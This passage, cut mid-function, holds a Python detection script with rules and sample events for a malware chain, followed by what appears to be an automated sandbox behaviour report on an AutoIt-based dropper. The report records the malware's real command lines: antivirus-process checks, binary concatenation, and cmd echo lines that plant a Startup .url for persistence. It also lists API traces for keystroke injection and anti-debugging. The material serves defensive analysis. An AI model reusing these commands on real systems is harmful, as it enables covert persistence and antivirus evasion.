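        if base == "cmd.exe" and "[internetshortcut]" in low and \
                "\\start menu\\programs\\startup\\" in low and \
                re.search("url=.*" + SCRIPT_EXT, low):
            hits.append(("startup_url_to_script", ev.pid))
        # Script host launching a non-Windows binary with a screensaver/PIF extension.
        if parent in ("wscript.exe", "cscript.exe") and \
                base.endswith((".scr", ".pif")) and "\\windows\\" not in img:
            hits.append(("script_host_spawns_scr", ev.pid))
    return hits


def matched_rules(events):
    return {rule for rule, _ in detect(events)}


# Constructed events; the command lines are the ones recorded in the report above.
U = r"C:\Users\user"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
PIF = U + r"\AppData\Local\Temp\103495\Powder.pif"
SCR = U + r"\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr"
JS = U + r"\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js"
URL = U + r"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url"
SAMPLE_EVENTS = [
    ProcEvent(2000, 1000, U + r"\Desktop\cW5i0RdQ4L.exe", CMD,
              r'"C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.bat'),
    ProcEvent(2001, 2000, CMD, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    ProcEvent(2002, 2000, CMD, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /I "wrsa opssvc"'),
    ProcEvent(2003, 2000, CMD, r"C:\Windows\SysWOW64\findstr.exe",
              'findstr /V "aroundaccommodategroupseverything" Fine'),
    ProcEvent(2004, 2000, CMD, CMD, r"cmd /c copy /b ..\Correct + ..\Transparent + ..\Barbie"
              r" + ..\Gloves + ..\Latin + ..\Story + ..\Ski + ..\Appraisal n"),
    ProcEvent(2005, 2000, CMD, PIF, "Powder.pif n"),
    ProcEvent(2006, 2005, PIF, CMD,
              f'cmd /k echo [InternetShortcut] > "{URL}" & echo URL="{JS}" >> "{URL}" & exit'),
    ProcEvent(2007, 3000, r"C:\Windows\System32\wscript.exe", SCR,
              f'"{SCR}" "{U}\\AppData\\Local\\GuardianCrypto Systems Inc\\O"'),
]
```

Running detect(SAMPLE_EVENTS) yields one hit per stage of the chain, with the .scr launch matching both the AppData rule and the script-host rule. The rules key on the technique (inverse-match carving, binary concatenation, a renamed interpreter argument, a Startup .url aimed at a script) rather than on the file names Centres, Fine, Powder or n, and the tasklist/findstr pairing needs the parent-PID correlation: a findstr carrying product names on its own is common in legitimate scripts. Powder.pif being started with the single argument n, the file copy /b just assembled, together with the OriginalFilenameAutoIt3.exe string the report finds in the dropper's memory, is consistent with a renamed AutoIt3 interpreter running a script, which is an inference from this report rather than something it states.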

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif File created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E859B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 10_2_00E859B3
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E15EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 10_2_00E15EDA
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_009659B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 16_2_009659B3
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_008F5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 16_2_008F5EDA
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E233B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 10_2_00E233B7
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif API coverage: 5.0 %
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr API coverage: 4.8 %
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E64005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00E64005
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E6494A GetFileAttributesW,FindFirstFileW,FindClose, 10_2_00E6494A
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E63CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00E63CE2
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E6C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_00E6C2FF
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E6CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 10_2_00E6CD9F
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E6CD14 FindFirstFileW,FindClose, 10_2_00E6CD14
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E6F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_00E6F5D8
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E6F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_00E6F735
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E6FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_00E6FA36
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_00944005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 16_2_00944005
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_0094494A GetFileAttributesW,FindFirstFileW,FindClose, 16_2_0094494A
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_0094C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 16_2_0094C2FF
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_0094CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 16_2_0094CD9F
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_0094CD14 FindFirstFileW,FindClose, 16_2_0094CD14
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_0094F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 16_2_0094F5D8
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_0094F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 16_2_0094F735
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_0094FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 16_2_0094FA36
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_00943CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 16_2_00943CE2
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E15D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 10_2_00E15D13
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\103495\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\103495
Source: Powder.pif, 0000000A.00000002.3572166645.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D10000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D51000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E745D5 BlockInput, 10_2_00E745D5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E15240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 10_2_00E15240
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E35CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 10_2_00E35CAC
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E588CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 10_2_00E588CD
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E2A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_00E2A385
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E2A354 SetUnhandledExceptionFilter, 10_2_00E2A354
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_0090A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_0090A385
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_0090A354 SetUnhandledExceptionFilter, 16_2_0090A354
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E59369 LogonUserW, 10_2_00E59369
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E15240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 10_2_00E15240
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E61AC6 SendInput,keybd_event, 10_2_00E61AC6
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E651E2 mouse_event, 10_2_00E651E2
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 103495
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "aroundaccommodategroupseverything" Fine
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Correct + ..\Transparent + ..\Barbie + ..\Gloves + ..\Latin + ..\Story + ..\Ski + ..\Appraisal n
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Powder.pif n
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\O"
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardiancryptoelite.url" & echo url="c:\users\user\appdata\local\guardiancrypto systems inc\guardiancryptoelite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardiancryptoelite.url" & exit
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardiancryptoelite.url" & echo url="c:\users\user\appdata\local\guardiancrypto systems inc\guardiancryptoelite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardiancryptoelite.url" & exit
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E588CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 10_2_00E588CD
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E64F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 10_2_00E64F1C
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.0000000002980000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmp, Powder.pif, 0000000A.00000003.1761264512.0000000004589000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Powder.pif, GuardianCryptoElite.scr Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E2885B cpuid 10_2_00E2885B
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E40030 GetLocalTime,__swprintf, 10_2_00E40030
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E40722 GetUserNameW, 10_2_00E40722
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E3416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 10_2_00E3416A
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406805
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: GuardianCryptoElite.scr Binary or memory string: WIN_81
Source: GuardianCryptoElite.scr Binary or memory string: WIN_XP
Source: GuardianCryptoElite.scr Binary or memory string: WIN_XPe
Source: GuardianCryptoElite.scr Binary or memory string: WIN_VISTA
Source: GuardianCryptoElite.scr Binary or memory string: WIN_7
Source: GuardianCryptoElite.scr Binary or memory string: WIN_8
Source: Serious.0.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E7696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 10_2_00E7696E
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E76E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 10_2_00E76E32
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_0095696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 16_2_0095696E
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_00956E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 16_2_00956E32